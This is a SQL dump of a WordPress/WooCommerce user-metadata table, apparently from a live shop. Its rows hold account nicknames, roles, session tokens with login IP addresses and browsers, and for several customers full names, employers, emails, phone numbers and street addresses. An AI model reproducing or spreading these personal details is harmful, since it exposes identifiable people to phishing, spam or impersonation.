INSERT INTO `wp_usermeta` VALUES (245, 8, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (246, 8, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (247, 8, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (248, 8, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (249, 8, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (250, 8, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (251, 8, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (252, 8, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (253, 8, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (254, 8, '_yoast_wpseo_profile_updated', '1475037416'); 
INSERT INTO `wp_usermeta` VALUES (256, 9, 'nickname', 'ecarter'); 
INSERT INTO `wp_usermeta` VALUES (257, 9, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (258, 9, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (259, 9, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (260, 9, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (261, 9, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (262, 9, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (263, 9, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (264, 9, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (265, 9, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (266, 9, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (267, 9, '_yoast_wpseo_profile_updated', '1475042354'); 
INSERT INTO `wp_usermeta` VALUES (268, 9, 'session_tokens', 'a:1:{s:64:"6de591d518fd264e3b86b98a432e1e1a025a07ba2731cc1f52216e573184849a";a:4:{s:10:"expiration";i:1476251954;s:2:"ip";s:12:"182.71.39.42";s:2:"ua";s:102:"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36";s:5:"login";i:1475042354;}}'); 
INSERT INTO `wp_usermeta` VALUES (269, 10, 'nickname', 'jjjjj'); 
INSERT INTO `wp_usermeta` VALUES (270, 10, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (271, 10, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (272, 10, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (273, 10, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (274, 10, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (275, 10, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (276, 10, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (277, 10, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (278, 10, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (279, 10, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (280, 10, '_yoast_wpseo_profile_updated', '1475066582'); 
INSERT INTO `wp_usermeta` VALUES (282, 10, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (283, 10, 'session_tokens', 'a:1:{s:64:"2844f26c0052ac21fde76c5e1c3bc4c272b3df66872965c387e2af08eb192c80";a:4:{s:10:"expiration";i:1475241768;s:2:"ip";s:10:"107.3.77.7";s:2:"ua";s:127:"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586";s:5:"login";i:1475068968;}}'); 
INSERT INTO `wp_usermeta` VALUES (284, 11, 'nickname', 'lwilson'); 
INSERT INTO `wp_usermeta` VALUES (285, 11, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (286, 11, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (287, 11, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (288, 11, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (289, 11, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (290, 11, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (291, 11, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (292, 11, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (293, 11, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (294, 11, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (295, 11, '_yoast_wpseo_profile_updated', '1475072271'); 
INSERT INTO `wp_usermeta` VALUES (296, 11, 'session_tokens', 'a:1:{s:64:"5e0a92dc44d8b2921ff8d96201206d1c8d86d56dea90b88c363ee8ce46a79bd0";a:4:{s:10:"expiration";i:1476281871;s:2:"ip";s:12:"50.199.37.18";s:2:"ua";s:110:"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36";s:5:"login";i:1475072271;}}'); 
INSERT INTO `wp_usermeta` VALUES (297, 12, 'nickname', 'sfalcone'); 
INSERT INTO `wp_usermeta` VALUES (298, 12, 'first_name', 'Sue'); 
INSERT INTO `wp_usermeta` VALUES (299, 12, 'last_name', 'Falcone'); 
INSERT INTO `wp_usermeta` VALUES (300, 12, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (301, 12, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (302, 12, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (303, 12, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (304, 12, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (305, 12, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (306, 12, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (307, 12, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (308, 12, '_yoast_wpseo_profile_updated', '1475082302'); 
INSERT INTO `wp_usermeta` VALUES (310, 12, 'session_tokens', 'a:2:{s:64:"bed2c23cbd21ae46e96d9b91478c2e6f4f10e29f24eb2e2642b40511c057c2a3";a:4:{s:10:"expiration";i:1502384250;s:2:"ip";s:13:"198.0.163.153";s:2:"ua";s:114:"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36";s:5:"login";i:1502211450;}s:64:"f23eeec0aa1ffbfd6e53bb83e20189e7f9f396046f5e3656ca7fd7167c3ca974";a:4:{s:10:"expiration";i:1503497639;s:2:"ip";s:13:"198.0.163.153";s:2:"ua";s:114:"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36";s:5:"login";i:1502288039;}}'); 
INSERT INTO `wp_usermeta` VALUES (311, 13, 'nickname', 'hienautotech'); 
INSERT INTO `wp_usermeta` VALUES (312, 13, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (313, 13, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (314, 13, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (315, 13, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (316, 13, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (317, 13, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (318, 13, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (319, 13, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (320, 13, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (321, 13, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (322, 13, '_yoast_wpseo_profile_updated', '1475076124'); 
INSERT INTO `wp_usermeta` VALUES (323, 13, 'session_tokens', 'a:1:{s:64:"2eef702d6a97214599717ffe0d5da50878ab861ac84cb82cdccbef42021e27c6";a:4:{s:10:"expiration";i:1476285724;s:2:"ip";s:13:"113.185.53.46";s:2:"ua";s:132:"Mozilla/5.0 (iPad; CPU OS 9_3_3 like Mac OS X) AppleWebKit/601.1 (KHTML, like Gecko) CriOS/50.0.2661.95 Mobile/13G34 Safari/601.1.46";s:5:"login";i:1475076124;}}'); 
INSERT INTO `wp_usermeta` VALUES (324, 13, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (325, 14, 'nickname', 's.gater'); 
INSERT INTO `wp_usermeta` VALUES (326, 14, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (327, 14, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (328, 14, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (329, 14, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (330, 14, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (331, 14, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (332, 14, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (333, 14, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (334, 14, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (335, 14, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (336, 14, '_yoast_wpseo_profile_updated', '1475076408'); 
INSERT INTO `wp_usermeta` VALUES (337, 14, 'session_tokens', 'a:1:{s:64:"2b7e8aef40d91a7d36e25fbb9726357f42ccb4db63721cb95c9d200d9f53484c";a:4:{s:10:"expiration";i:1476286008;s:2:"ip";s:13:"73.10.187.250";s:2:"ua";s:102:"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36";s:5:"login";i:1475076408;}}'); 
INSERT INTO `wp_usermeta` VALUES (338, 14, 'billing_first_name', 'scott'); 
INSERT INTO `wp_usermeta` VALUES (339, 14, 'billing_last_name', 'gater'); 
INSERT INTO `wp_usermeta` VALUES (340, 14, 'billing_company', 'Itech Instruments'); 
INSERT INTO `wp_usermeta` VALUES (341, 14, 'billing_email', 's.gater@itech-instruments.com'); 
INSERT INTO `wp_usermeta` VALUES (342, 14, 'billing_phone', '6099247310'); 
INSERT INTO `wp_usermeta` VALUES (343, 14, 'billing_country', 'US'); 
INSERT INTO `wp_usermeta` VALUES (344, 14, 'billing_address_1', '816 Silvia St'); 
INSERT INTO `wp_usermeta` VALUES (345, 14, 'billing_address_2', 'Bldg B'); 
INSERT INTO `wp_usermeta` VALUES (346, 14, 'billing_city', 'EWING'); 
INSERT INTO `wp_usermeta` VALUES (347, 14, 'billing_state', 'NJ'); 
INSERT INTO `wp_usermeta` VALUES (348, 14, 'billing_postcode', '08628'); 
INSERT INTO `wp_usermeta` VALUES (349, 14, 'last_update', '1475077248'); 
INSERT INTO `wp_usermeta` VALUES (350, 12, 'wpseo_title', ''); 
INSERT INTO `wp_usermeta` VALUES (351, 12, 'wpseo_metadesc', ''); 
INSERT INTO `wp_usermeta` VALUES (352, 12, 'wpseo_metakey', ''); 
INSERT INTO `wp_usermeta` VALUES (353, 12, 'wpseo_excludeauthorsitemap', ''); 
INSERT INTO `wp_usermeta` VALUES (354, 12, 'wpseo_content_analysis_disable', ''); 
INSERT INTO `wp_usermeta` VALUES (355, 12, 'wpseo_keyword_analysis_disable', ''); 
INSERT INTO `wp_usermeta` VALUES (356, 12, 'billing_first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (357, 12, 'billing_last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (358, 12, 'billing_company', ''); 
INSERT INTO `wp_usermeta` VALUES (359, 12, 'billing_address_1', ''); 
INSERT INTO `wp_usermeta` VALUES (360, 12, 'billing_address_2', ''); 
INSERT INTO `wp_usermeta` VALUES (361, 12, 'billing_city', ''); 
INSERT INTO `wp_usermeta` VALUES (362, 12, 'billing_postcode', ''); 
INSERT INTO `wp_usermeta` VALUES (363, 12, 'billing_country', ''); 
INSERT INTO `wp_usermeta` VALUES (364, 12, 'billing_state', ''); 
INSERT INTO `wp_usermeta` VALUES (365, 12, 'billing_phone', ''); 
INSERT INTO `wp_usermeta` VALUES (366, 12, 'billing_email', ''); 
INSERT INTO `wp_usermeta` VALUES (367, 12, 'shipping_first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (368, 12, 'shipping_last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (369, 12, 'shipping_company', ''); 
INSERT INTO `wp_usermeta` VALUES (370, 12, 'shipping_address_1', ''); 
INSERT INTO `wp_usermeta` VALUES (371, 12, 'shipping_address_2', ''); 
INSERT INTO `wp_usermeta` VALUES (372, 12, 'shipping_city', ''); 
INSERT INTO `wp_usermeta` VALUES (373, 12, 'shipping_postcode', ''); 
INSERT INTO `wp_usermeta` VALUES (374, 12, 'shipping_country', ''); 
INSERT INTO `wp_usermeta` VALUES (375, 12, 'shipping_state', ''); 
INSERT INTO `wp_usermeta` VALUES (376, 12, 'googleplus', ''); 
INSERT INTO `wp_usermeta` VALUES (377, 12, 'twitter', ''); 
INSERT INTO `wp_usermeta` VALUES (378, 12, 'facebook', ''); 
INSERT INTO `wp_usermeta` VALUES (379, 12, 'last_update', '1475082302'); 
INSERT INTO `wp_usermeta` VALUES (380, 15, 'nickname', 'jarelis.roman2'); 
INSERT INTO `wp_usermeta` VALUES (381, 15, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (382, 15, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (383, 15, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (384, 15, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (385, 15, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (386, 15, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (387, 15, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (388, 15, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (389, 15, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (390, 15, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (391, 15, '_yoast_wpseo_profile_updated', '1475090266'); 
INSERT INTO `wp_usermeta` VALUES (392, 15, 'session_tokens', 'a:1:{s:64:"4e57e63794a06104bb135c3c8b30f6f39a6a9e26752929dd63188f2c9f22ec16";a:4:{s:10:"expiration";i:1476299867;s:2:"ip";s:14:"192.249.47.179";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1475090267;}}'); 
INSERT INTO `wp_usermeta` VALUES (393, 16, 'nickname', 'shujie.yang'); 
INSERT INTO `wp_usermeta` VALUES (394, 16, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (395, 16, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (396, 16, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (397, 16, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (398, 16, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (399, 16, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (400, 16, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (401, 16, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (402, 16, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (403, 16, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (404, 16, '_yoast_wpseo_profile_updated', '1475095576'); 
INSERT INTO `wp_usermeta` VALUES (405, 16, 'session_tokens', 'a:1:{s:64:"293708f435755ab30ba278e8d4dba598e92ad6acb5e32c8e8287a01b5c8a1853";a:4:{s:10:"expiration";i:1476305176;s:2:"ip";s:10:"152.3.34.5";s:2:"ua";s:73:"Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0";s:5:"login";i:1475095576;}}'); 
INSERT INTO `wp_usermeta` VALUES (406, 17, 'nickname', 'lynnb'); 
INSERT INTO `wp_usermeta` VALUES (407, 17, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (408, 17, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (409, 17, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (410, 17, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (411, 17, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (412, 17, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (413, 17, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (414, 17, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (415, 17, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (416, 17, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (417, 17, '_yoast_wpseo_profile_updated', '1475176204'); 
INSERT INTO `wp_usermeta` VALUES (418, 17, 'session_tokens', 'a:1:{s:64:"064a4f602a41a4f4a772ca56d8cbe5648a591b4c823e344f6159b84fc4fd8f48";a:4:{s:10:"expiration";i:1503162555;s:2:"ip";s:13:"198.0.163.153";s:2:"ua";s:114:"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36";s:5:"login";i:1502989755;}}'); 
INSERT INTO `wp_usermeta` VALUES (419, 17, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (420, 14, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (421, 18, 'nickname', 'rex.blackwell'); 
INSERT INTO `wp_usermeta` VALUES (422, 18, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (423, 18, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (424, 18, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (425, 18, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (426, 18, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (427, 18, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (428, 18, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (429, 18, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (430, 18, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (431, 18, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (432, 18, '_yoast_wpseo_profile_updated', '1475150884'); 
INSERT INTO `wp_usermeta` VALUES (434, 18, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (435, 19, 'nickname', 'carol.quackenbush'); 
INSERT INTO `wp_usermeta` VALUES (436, 19, 'first_name', 'Robert'); 
INSERT INTO `wp_usermeta` VALUES (437, 19, 'last_name', 'Comstock'); 
INSERT INTO `wp_usermeta` VALUES (438, 19, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (439, 19, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (440, 19, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (441, 19, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (442, 19, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (443, 19, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (444, 19, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (445, 19, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (446, 19, '_yoast_wpseo_profile_updated', '1475155451'); 
INSERT INTO `wp_usermeta` VALUES (448, 19, 'billing_first_name', 'Robert'); 
INSERT INTO `wp_usermeta` VALUES (449, 19, 'billing_last_name', 'Comstock'); 
INSERT INTO `wp_usermeta` VALUES (450, 19, 'billing_company', 'API Technologies Corp.'); 
INSERT INTO `wp_usermeta` VALUES (451, 19, 'billing_email', 'carol.quackenbush@apitech.com'); 
INSERT INTO `wp_usermeta` VALUES (452, 19, 'billing_phone', '315-237-6611'); 
INSERT INTO `wp_usermeta` VALUES (453, 19, 'billing_country', 'US'); 
INSERT INTO `wp_usermeta` VALUES (454, 19, 'billing_address_1', '8031 Avonia Road'); 
INSERT INTO `wp_usermeta` VALUES (455, 19, 'billing_address_2', ''); 
INSERT INTO `wp_usermeta` VALUES (456, 19, 'billing_city', 'Fairview'); 
INSERT INTO `wp_usermeta` VALUES (457, 19, 'billing_state', 'PA'); 
INSERT INTO `wp_usermeta` VALUES (458, 19, 'billing_postcode', '16415'); 
INSERT INTO `wp_usermeta` VALUES (459, 19, 'last_update', '1475155705'); 
INSERT INTO `wp_usermeta` VALUES (461, 19, 'session_tokens', 'a:2:{s:64:"d085e5c15634790aee4cf267361d053cc0d3b16dc1a9bda1946b6705ef723037";a:4:{s:10:"expiration";i:1475328560;s:2:"ip";s:13:"192.168.7.244";s:2:"ua";s:61:"Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1475155760;}s:64:"08b301f44eca34853392bce96993e3c493448abccdb4c85970e8352d999e8dc6";a:4:{s:10:"expiration";i:1475328888;s:2:"ip";s:13:"192.168.7.244";s:2:"ua";s:61:"Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1475156088;}}'); 
INSERT INTO `wp_usermeta` VALUES (462, 3, '_yoast_wpseo_profile_updated', '1477414099'); 
INSERT INTO `wp_usermeta` VALUES (463, 3, 'wpseo_title', ''); 
INSERT INTO `wp_usermeta` VALUES (464, 3, 'wpseo_metadesc', ''); 
INSERT INTO `wp_usermeta` VALUES (465, 3, 'wpseo_metakey', ''); 
INSERT INTO `wp_usermeta` VALUES (466, 3, 'wpseo_excludeauthorsitemap', ''); 
INSERT INTO `wp_usermeta` VALUES (467, 3, 'wpseo_content_analysis_disable', ''); 
INSERT INTO `wp_usermeta` VALUES (468, 3, 'wpseo_keyword_analysis_disable', ''); 
INSERT INTO `wp_usermeta` VALUES (469, 3, 'twitter', ''); 
INSERT INTO `wp_usermeta` VALUES (470, 3, 'facebook', ''); 
INSERT INTO `wp_usermeta` VALUES (471, 20, 'nickname', 'kmsoulliere'); 
INSERT INTO `wp_usermeta` VALUES (472, 20, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (473, 20, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (474, 20, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (475, 20, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (476, 20, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (477, 20, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (478, 20, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (479, 20, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (480, 20, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (481, 20, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (482, 20, '_yoast_wpseo_profile_updated', '1475158385'); 
INSERT INTO `wp_usermeta` VALUES (485, 20, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (486, 17, 'wpseo_title', ''); 
INSERT INTO `wp_usermeta` VALUES (487, 17, 'wpseo_metadesc', ''); 
INSERT INTO `wp_usermeta` VALUES (488, 17, 'wpseo_metakey', ''); 
INSERT INTO `wp_usermeta` VALUES (489, 17, 'wpseo_excludeauthorsitemap', ''); 
INSERT INTO `wp_usermeta` VALUES (490, 17, 'wpseo_content_analysis_disable', ''); 
INSERT INTO `wp_usermeta` VALUES (491, 17, 'wpseo_keyword_analysis_disable', ''); 
INSERT INTO `wp_usermeta` VALUES (492, 17, 'billing_first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (493, 17, 'billing_last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (494, 17, 'billing_company', ''); 
INSERT INTO `wp_usermeta` VALUES (495, 17, 'billing_address_1', ''); 
INSERT INTO `wp_usermeta` VALUES (496, 17, 'billing_address_2', ''); 
INSERT INTO `wp_usermeta` VALUES (497, 17, 'billing_city', ''); 
INSERT INTO `wp_usermeta` VALUES (498, 17, 'billing_postcode', ''); 
INSERT INTO `wp_usermeta` VALUES (499, 17, 'billing_country', ''); 
INSERT INTO `wp_usermeta` VALUES (500, 17, 'billing_state', ''); 
INSERT INTO `wp_usermeta` VALUES (501, 17, 'billing_phone', ''); 
INSERT INTO `wp_usermeta` VALUES (502, 17, 'billing_email', ''); 
INSERT INTO `wp_usermeta` VALUES (503, 17, 'shipping_first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (504, 17, 'shipping_last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (505, 17, 'shipping_company', ''); 
INSERT INTO `wp_usermeta` VALUES (506, 17, 'shipping_address_1', ''); 
INSERT INTO `wp_usermeta` VALUES (507, 17, 'shipping_address_2', ''); 
INSERT INTO `wp_usermeta` VALUES (508, 17, 'shipping_city', ''); 
INSERT INTO `wp_usermeta` VALUES (509, 17, 'shipping_postcode', ''); 
INSERT INTO `wp_usermeta` VALUES (510, 17, 'shipping_country', ''); 
INSERT INTO `wp_usermeta` VALUES (511, 17, 'shipping_state', ''); 
INSERT INTO `wp_usermeta` VALUES (512, 17, 'googleplus', ''); 
INSERT INTO `wp_usermeta` VALUES (513, 17, 'twitter', ''); 
INSERT INTO `wp_usermeta` VALUES (514, 17, 'facebook', ''); 
INSERT INTO `wp_usermeta` VALUES (515, 17, 'last_update', '1475176204'); 
INSERT INTO `wp_usermeta` VALUES (516, 11, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (517, 21, 'nickname', 'keith.crider'); 
INSERT INTO `wp_usermeta` VALUES (518, 21, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (519, 21, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (520, 21, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (521, 21, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (522, 21, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (523, 21, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (524, 21, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (525, 21, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (526, 21, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (527, 21, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (528, 21, '_yoast_wpseo_profile_updated', '1475186250'); 
INSERT INTO `wp_usermeta` VALUES (529, 21, 'session_tokens', 'a:1:{s:64:"e197e056ffc603dfb105a56434712193ba40b1ff687dd659b2f4f40ac93247fa";a:4:{s:10:"expiration";i:1476395850;s:2:"ip";s:15:"134.223.116.154";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1475186250;}}'); 
INSERT INTO `wp_usermeta` VALUES (530, 22, 'nickname', 'athongs'); 
INSERT INTO `wp_usermeta` VALUES (531, 22, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (532, 22, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (533, 22, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (534, 22, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (535, 22, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (536, 22, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (537, 22, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (538, 22, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (539, 22, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (540, 22, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (541, 22, '_yoast_wpseo_profile_updated', '1475209377'); 
